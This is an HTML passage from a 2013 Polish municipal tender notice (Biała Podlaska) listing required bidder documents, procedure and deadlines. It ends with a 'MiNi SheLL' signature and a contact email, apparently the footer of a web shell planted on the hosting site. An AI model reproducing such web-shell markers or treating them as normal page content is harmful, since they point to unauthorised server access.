<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty.(przy składaniu przez wykonawców oferty wspólnej należy złożyć jeden dokument),
2.pełnomocnictwo (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Pzp przewidział następujące okoliczności, które mogą powodować konieczność wprowadzenia istotnych zmian w treści zawartej umowy w formie aneksu, pod następującymi warunkami:

1. zmiana terminu realizacji zamówienia z powodu:
1.1	przestojów i opóźnień zawinionych przez zamawiającego;
1.2.	działania siły wyższej(np. klęski żywiołowe, strajki generalne i lokalne);
1.3	przerw w realizacji robót powstałych z przyczyn niezależnych od wykonawcy
1.4  pisemnego uzgodnienia pomiędzy stronami dotyczącego skrócenia terminu;
  
2. wystąpienie okoliczności których zamawiający nie był w stanie przewidzieć, pomimo   zachowania należytej staranności.
3. w przypadku ustawowej zmiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bialapodlaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
21-500 Biała Podlaska, ul. Marszałka Józefa Piłsudskiego 3
Referat Zamówień Publicznych  pok. nr 230.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2013 godzina 12:00, miejsce: Urząd Miasta
21-500 Biała Podlaska, ul. Marszałka Józefa Piłsudskiego 3
kancelaria ogólna pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja o zamiarze ustanowienia dynamicznego systemu zakupów: Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com